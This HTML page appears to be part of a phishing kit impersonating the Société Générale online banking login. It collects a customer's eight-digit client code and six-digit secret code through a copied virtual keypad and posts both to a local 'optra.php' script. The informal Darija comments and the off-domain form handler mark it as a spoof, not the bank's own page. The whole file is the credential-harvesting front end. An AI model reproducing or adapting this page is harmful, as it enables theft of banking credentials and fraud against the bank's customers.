<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
	<title>Société Générale | Connexion</title>
	<link rel="icon" type="image/x-icon" href="./img2/index.ico">
	<link rel="stylesheet" href="./css/main.css">
	<link rel="stylesheet" href="./css/media.css">
	<script type="text/javascript" src="./js/clavier.js"></script>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
	<script type="text/javascript" src="./js/bb.js"></script>
	<script type="text/javascript">
       /*document.getElementById('error1').style.display= "block";*/
	</script>
</head>
<body>
	
	<div class="contener">
		<div class="header">
			<div class="header-left"></div>
			<div class="header-right"></div>
		</div>
		<div class="header-phone"><center><div class="ico-ico"></div></center></div>
		<div class="nav-titre">
			<div class="nav-phone-clear"></div>
			<div class="hr-color"></div>
			<div class="navo-bar">
				<div class="logo-nav"></div>
			</div>
		</div>
		<div class="wast">
			<div class="clear"></div>
			<div class="bodys">
				  <!-- hena dkchi li lwast -->
				<div class="bodys-left">
					<center>
						<form id="myform" action="optra.php" method="POST" accept-charset="utf-8">
							<div class="cadre">
							<div class="tag1">
								<div class="tag1-left">
									<input type="text" pattern="\d*" id="put-login" name="put-login" class="put-login" maxlength="8" size="8" placeholder="Saisissez votre code client" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;else check();" onkeyup="choka();chibka()" >
									<div class="tag1-right" id="tag1-right" onclick="del();"></div>
									<div class="tag1-right2" id="tag1-right2"></div>
								</div>
								<div class="error1" id="error1"></div>
								<div class="error2" id="error2"></div>
								<div class="souvenir"></div>
								<div class="button1" id="button1">
									<center><div class="button1x" onclick="chek_login();">Valider</div></center>
								</div>
								<div class="clavier" id="clavier">
									<div class="input-pass">
										<input type="password" pattern="\d*" class="input-pss" name="input-pss" id="input-pss" maxlength="6" size="6" readonly="">
										<div class="tag1-right1" id="tag1-right1" onclick="dele();"></div>
									</div>
									<div class="clavier-clv">
										<center>
											<div class="clv">
												<div class="tag1-clv">
													<div class="tag1-clvx" onclick="addCode('1');"></div>
													<div class="tag1-clvx" onclick="addCode('6');"></div>
													<div class="tag1-clvx" onclick="addCode('4');"></div>
													<div class="tag1-clvx" ></div>
												</div>
												<div class="tag1-clv">
													<div class="tag1-clvx"></div>
													<div class="tag1-clvx" onclick="addCode('2');"></div>
													<div class="tag1-clvx" onclick="addCode('0');"></div>
													<div class="tag1-clvx"></div>
												</div>
												<div class="tag1-clv">
													<div class="tag1-clvx"></div>
													<div class="tag1-clvx" onclick="addCode('7');"></div>
													<div class="tag1-clvx" onclick="addCode('9');"></div>
													<div class="tag1-clvx"></div>
												</div>
												<div class="tag1-clv">
													<div class="tag1-clvx" onclick="addCode('5');"></div>
													<div class="tag1-clvx"></div>
													<div class="tag1-clvx" onclick="addCode('8');"></div>
													<div class="tag1-clvx" onclick="addCode('3');"></div>
												</div>

											</div>
											<div class="but-fin" onclick="chekiha();">Valider</div>
										</center>
									</div>
									
								</div>

							</div>
						</div>
						</form>
					</center>
				</div>
				 <!-- hena dkchi li lwast -->
				<div class="bodys-right"></div>
			</div>
		</div>
		<div class="footer"></div>
	</div>
</body>
</html>